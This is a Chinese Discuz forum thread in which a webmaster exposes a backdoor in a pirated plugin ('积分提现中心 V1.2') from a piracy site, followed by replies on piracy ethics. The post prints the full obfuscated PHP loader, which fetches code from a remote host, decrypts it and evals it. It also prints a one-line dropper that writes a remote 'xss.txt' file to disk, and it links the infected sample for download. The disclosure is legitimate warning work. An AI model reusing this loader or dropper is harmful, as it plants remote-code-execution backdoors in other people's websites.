【续集】魔趣吧的东西真的有后门木马，揭秘用盗版的危害

密码忘了

上次写了一篇文章 披露了盗版市场的乱象 ，没想到本人遭到魔趣吧的站长疯狂的报复。我自己的网站已经持续快10天被魔趣吧的站长使用DDOS攻击技术，打不开了！因为在其网站进行了手机绑定，手机也整天被短信+电话轰炸！搞的我最近经常要开飞行模式！
但是我是绝对不会像黑恶势力低头的，大不了我网站不做了，手机号码不用了！

前文回顾：魔趣吧的东西好像真的有后门木马，改了我dz的后台密码
https://www.dismall.com/thread-5095-1-1.html

因为前面的那篇文章写的比较概况，没有列举证据（导致其大肆误导不明真相的群众说我在造谣），今天我就来列举一些证据，并对已知的后门进行深入详细的分析！
这可能是最后一篇曝光盗版市场乱象的文章了，因为我只是一个普普通通的站长！那些江湖经验丰富的站长我惹不起，我也见识了魔趣吧是如果把黑的说成白的！

他的理念就是：只要对他有利的都是好文章，曝光他的都是在造谣他！

在正式进入主题之前，我想在说几句题外话：先不说他有没有干些见不得人的事，其损坏原创开发者权益，谋取自己的利益(俗称：盗版)，还有什么资格在那一副正人君子的模样怼这个怼那个！

【下面才是今天要说的主题】
由于带后门的资源有点多，今天我就随便拿个在魔趣吧收费的资源，且我之前安装过，受害的资源来做分析！

样本下载链接：为了不给他打广告，帖子ID： 9183 ，知道他网站的随便打开一个帖子把id换成这个就可以定位到！

因为是VIP资源，所以我分享到了蓝奏网盘：https://wws.lanzous.com/iH9IQe6jymf  密码:c9mx

附件MD5值：C03B189CA9E0EA7F1229F609A48EC705
防止因为我的曝光，他会修改附件，然后狡辩！对本文有异议的朋友可以在本文发布不久的时候，前去下载对比MD5值后，并效验是不是存在本文提到的后门木马！

样本插件名称：积分提现中心 V1.2

木马文件所在路径：keke_tixian\function\function_core.php


木马完整代码：

1. <?php
   
2. function zm_diconv($str){
   
3.   $encode = mb_detect_encoding($str, array(
   
4. 
   
5.         "ASCII",
   
6. 
   
7.         "UTF-8",
   
8. 
   
9.         "GB2312",
   
10. 
    
11.         "GBK",
    
12. 
    
13.         "BIG5"
    
14. 
    
15.     ));
    
16. 
    
17.     if ($encode != CHARSET) {
    
18. 
    
19.         //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);
    
20. 
    
21.         $keytitle = mb_convert_encoding($str, CHARSET, $encode);
    
22. 
    
23.     }
    
24. 
    
25.     if (!$keytitle) {
    
26. 
    
27.         $keytitle = $str;
    
28. 
    
29.     }
    
30. 
    
31.     return $keytitle;
    
32. 
    
33. }
    
34. function caidi($oo){
    
35.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
    
36.         $forver=stripos($love,'d');
    
37.         $forvere=stripos($love,'z');
    
38.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
    
39.         $forveres='DECODE';
    
40.         $aini=substr($love,$forver,$forvere);//获取方法函数名decrypt
    
41.         $aini=$oo?$forveres:$aini;
    
42.         return $aini;
    
43. }
    
44. function decrypt($data, $key = '721520') {
    
45.                 global $_G;
    
46.                 $key = $key ? $key : $_G['config']['security']['authkey'];
    
47.                 $type = caidi($key);
    
48.                 return authcode($data,$type, $key);
    
49.                 }
    
50. 
    
51. function contentz($svip) {
    
52. if(function_exists('file_get_contents')) {
    
53. $data = file_get_contents($svip);
    
54. } else {
    
55. $ch = curl_init();
    
56. $timeout = 5;
    
57. curl_setopt ($ch, CURLOPT_URL, $svip);
    
58. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    
59. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    
60. $data = curl_exec($ch);
    
61. curl_close($ch);
    
62. }
    
63. return $data;
    
64. }
    
65. $iloveyou = caidi($oo);
    
66. eval($iloveyou(strip_tags(contentz($love))));
    
67. ?>

复制代码

关键代码：

1. $iloveyou = caidi($oo);
   
2. eval($iloveyou(strip_tags(contentz($love))));

复制代码

有了这些信息 我们下面进行分析(在这里大胆的猜测一下：文件完全是魔趣吧自己加进去的，正版可能就没有这个文件，因为这个文件代码全是和后门有关！和插件自身功能没有关系)
在关键代码前面的都是木马伪装所需要用到的函数 执行过程如下：
1/----------------------

后门脚本执行入口：keke_tixian\admin.inc.php
关键代码在该文件第7行：引用后门文件并执行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解释：只要安装插件一打开后台的插件设置，木马就自动执行了！

2/--------依次执行----------


$iloveyou = caidi($oo);
解释：定义一个名为   iloveyou 的变量  ,值为： caidi($oo)
调试： $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ，得到 iloveyou 的值等于：decrypt
备注：函数 caidi 定义并赋值了 $love  作全局变量， love 的值等于：htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次执行----------

eval($iloveyou(strip_tags(contentz($love))));

解释：已知 iloveyou 的值等于：decrypt，得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函数 contentz 得知该函数 是访问远程链接并返回内容，相当于 curl
分析函数 decrypt 得知该函数 是进行内容解密，直接调用了DISCUZ自带的解密函数 authcode


解释的解释：代码 eval($iloveyou(strip_tags(contentz($love)))); ，经过层层分析，最终为：
执行脚本 ( 解密 ( 访问远程代码 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次执行----------

因 htt去p://zonekey.w掉in/b中ai文duseo.xml 该链接现在访问返回的全部是 1111111111111111，所以无法继续分析远程的代码是什么！

可能魔趣吧站长已经知道我接下来会深入曝光他。所以暂时把远程代码先全部改成了 1111111111111111
即使是这样！又如何？ 执行远程脚本 有什么危害？相信做网站的都知道！这里我不进行科普！感兴趣的站长可以百度自行科普：例：一句话木马，菜刀！
下面的代码是我网站自动多出来的一个文件：因为无法继续分析，直接看结果

1. <?php
   
2. file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));

复制代码

上面的xss.txt  防止 魔趣吧站长 再去取消 我上传到了 蓝奏网盘 https://wws.lanzous.com/iPkAWe6na9c 密码:i1nc

End/--------刨根问底--------

在前面一篇文章中提到过了  魔趣吧站长声称该木马是源码哥的！
但是既然干了，就干到底！
百度了一下 搜索 到 源码哥  ，在他网站搜索 了一下 积分提现中心  果然找到一个一模一样的版本！
花了20块钱下载下来（真黑啊，1.2  这么旧的版本还卖20），不过花20块钱 能让大家看清，防止中木马。也值得！

结局打脸： 没有 keke_tixian\function\function_core.php  这个文件，因为是边写边弄的，既然写好了就这样吧！
虽然没有发现木马，但是应该也是一丘之貉，还是呼吁大家不要用盗版！不要用盗版！不要用盗版！

PS：对魔趣吧站长传播木马，DDOS我的网站，短信+电话轰炸我的手机号 表示非常的鄙视！


希望官方管理员能够曝光这篇文章，让更多准备用盗版的站长、已经在用盗版的站长。赶紧回头是岸！
样本已经上传到蓝奏网盘，文章写的不到位的地方，欢迎各路大神补充！

密码忘了

文中忘记说了！不能编辑 就占楼吧！
看图打脸


1、保证无后门     
打脸：无后门！只是有木马
不如：保证无后门，绝对有木马！

2、魔趣吧修复后发布！
打脸：正版好好的东西，被魔趣吧修复一下就多了个后门木马？
不如：魔趣吧增加木马后发布

3、资源均经测试，请放心使用！
打脸：放个木马在你网站，你能放心？
不如：木马功能已经测试，请放心使用！零失误！


4、官方认证图标
打脸：魔趣吧官方正版木马，请放心中毒！

密码忘了

申明：本文不是针对 可可 正版的应用  正版应用肯定是没有木马的！
本文说的是盗版的！

湖中沉

简单点说：无利不起早

开发者的利，自然是卖产品，也就是卖插件模板，为了多得利，自然要做好产品
站长的利，自然是通过程序赚钱或专区流量最终变现（也许你现在不赚钱，但别说永远不打算赚钱）
盗版站的利，要么是钱，要么是流量，但最终和站长是一样的，还是变现，如果打着所谓免费旗号，那么最终一定会在隐藏的地方来想办法赚钱，那么很明显，黑产是最简单的选择，那么后门木马就不稀奇了。

赚钱可以，但请通过自己的劳动正当获益，你要是自己写代码提供给站长，谁也没权利指责你，但开发者费时费力的劳动所得，你偷去倒卖，这就很不道德了，并且不止是不道德，这是违法的。

再加上黑产，那么就更加让人愤怒了，也就是说两头吃。

无利不起早，为利无可厚非，但请紧守底线，尊重别人的劳动。

经常有“站长”指责开发者卖的贵，不厚道。那么请你能写出一样的东西免费提供出来，但不能是偷别人的东西提供出来哦。当你能写出一样的东西的时候，并能始终免费提供，我向您投以真诚的敬意。

但别人通过大量的学习、探索、耗费精力和时间，劳动所得写出的内容，以此获取回报，则不能予以谴责。我们自然应当感恩免费的馈赠，但也同时应当尊重劳动回报的需求。

重庆之家

以前贪便宜也是用盗版插件模版，安全中心三天两头的发出风险告警首页老是被改，删除了所有盗版插件模版，现在一直好好的

xiaomianlang

魔趣我不知道 反正哪个源码哥的肯定是有木马。都自己修改内容

罗永浩

几百块一个月上高防就行。

onetheme

罗永浩 发表于 2020-7-1 02:59
几百块一个月上高防就行。

能舍得几百块一个月高防用盗版，何不花百十块买个正版使用，不香吗？

初锦

嗯，当我看见你那个帖子的时候，发现一个叫做魔趣吧的用户回复了你但被discuz管理员屏蔽了我就知道事情不简单。我不站楼主和魔趣吧，我站discuz管理员的做法（放肆的大笑）

墨裔

这故事引起了我的注意